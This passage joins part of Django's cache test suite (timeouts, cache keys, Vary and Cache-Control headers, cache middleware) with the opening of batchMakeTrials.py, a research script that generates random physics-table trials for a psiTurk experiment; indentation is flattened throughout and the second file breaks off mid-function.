:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request, response))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
        # cache with non-empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
        # change the language again
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
        # change the language again
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
        Ensure the constructor correctly distinguishes between using CacheMiddleware
        as middleware and using it as a view decorator, and sets attributes
        appropriately in each case.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
        # ... but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
        # ... even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
    Tests various headers with TemplateResponse.
    Most are probably redundant since they manipulate the same object anyway,
    but the ETag header is special because it relies on the content being
    complete (which is not always the case with a TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
batchMakeTrials.py
|
from __future__ import division, print_function
from physicsTable import *
from physicsTable.constants import *
import threading
import pygame as pg
import random, os, sys
import numpy as np
import json
defVel = 300
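# defVel: default ball speed passed to RedGreenTrial as def_ball_vel when building trials.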
# modified trial folder:
#trialfolder = os.path.join('..','public_html','trials')
trialfolder = os.path.join('..','psiturk-rg','templates', 'trials')
#random.seed(10001)
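# makeRect: build a pygame Rect from an upper-left and lower-right corner pair.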
def makeRect(ul, lr):
return pg.Rect(ul, (lr[0]-ul[0],lr[1]-ul[1]))
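# checkOverlap: return True if any two objects in the trial (walls, goals, and
# the ball's bounding box, if a ball is present) overlap each other.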
def checkOverlap(trial):
walls = [makeRect(w[0],w[1]) for w in trial.normwalls]
goals = [makeRect(g[0],g[1]) for g in trial.goals]
objs = walls + goals
b = trial.ball
if b is not None:
br = makeRect((b[0][0]-b[2],b[1][0]-b[2]),(b[2]*2,b[2]*2))
objs.append(br)
for i in range(len(objs) - 1):
o = objs[i]
cls = o.collidelist(objs[(i+1):])
if cls != -1: return True
return False
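# checkCoverage: simulate the trial forward and report [never fully occluded,
# fully occluded for at least `minsteps` consecutive frames].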
def checkCoverage(trial, minsteps = 20, FPS = 40.):
tb = trial.makeTable()
notcovered = True
covered = False
ncovs = 0
while tb.step(1/FPS) is None:
if tb.fullyOcc():
notcovered = False
ncovs += 1
if ncovs >= minsteps: covered = True
else: ncovs = 0
return [notcovered, covered]
def checkSmallVel(v):
    # Reject velocities pointing within pi/40 of the horizontal or vertical axis;
    # a perfectly vertical velocity (x == 0) is also rejected, which avoids a
    # division-by-zero in the angle computation.
    x = abs(v[0])
    y = abs(v[1])
    if x == 0:
        return True
    atan = np.arctan(y/x)
    return (atan < np.pi/40) or (atan > 19*np.pi/40)
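# MakeRandTrial: repeatedly lay out a random red/green trial (two goals, `blocks`
# walls, `occs` occluders, and a ball) until a layout passes every check:
# no overlaps, a consistent outcome that is neither too short nor too long,
# and the requested occlusion behaviour (`covered`).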
def MakeRandTrial(name, blocks, occs, covered = False, blockdims = (50,300), occdims = (150, 400), res = (1000, 620), maxfails = 10000):
retry_flag = True
while retry_flag:
fails = 0
chk = False
tr = RedGreenTrial(name, res, def_ball_vel = defVel)
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addGoal(pos,lr,REDGOAL,RED)
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addGoal(pos,lr,GREENGOAL,GREEN)
if checkOverlap(tr):
fails += 1
tr.goals = [tr.goals[0]]
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
for i in range(blocks):
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addWall(pos,lr)
if checkOverlap(tr):
fails += 1
tr.normwalls = tr.normwalls[:-1]
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
for i in range(occs):
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
noc = pg.Rect(pos,blocksize)
if noc.collidelist([makeRect(o[0],o[1]) for o in tr.occs]) == -1:
tr.addOcc(pos,lr)
chk = True
else:
fails += 1
bsize = tr.dbr
chk = False
while not chk:
bpos = (random.randint(bsize, res[0]-bsize), random.randint(bsize,res[1]-bsize))
vchk = False
while not vchk:
bvel = (random.random(), random.random())
if not checkSmallVel(bvel): vchk = True
tr.addBall(bpos, bvel)
if checkOverlap(tr):
fails += 1
tr.ball = None
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
tr.normalizeVel()
if not tr.checkConsistency(maxsteps=10000):
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
if tr.checkConsistency(maxsteps=3000):
print("Too short")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
coverage = checkCoverage(tr)
if covered:
if not coverage[1]:
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
else:
if not coverage[0]:
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
retry_flag = False
return tr
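# threadMakeTrial: worker run in its own thread; generates `nTrials` trials with
# `b` walls each and saves any that do not already exist in `output_dir`.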
def threadMakeTrial(nTrials, b):
for i in range(nTrials):
nm = "RTr_Bl" + str(b) + "_" + str(i)
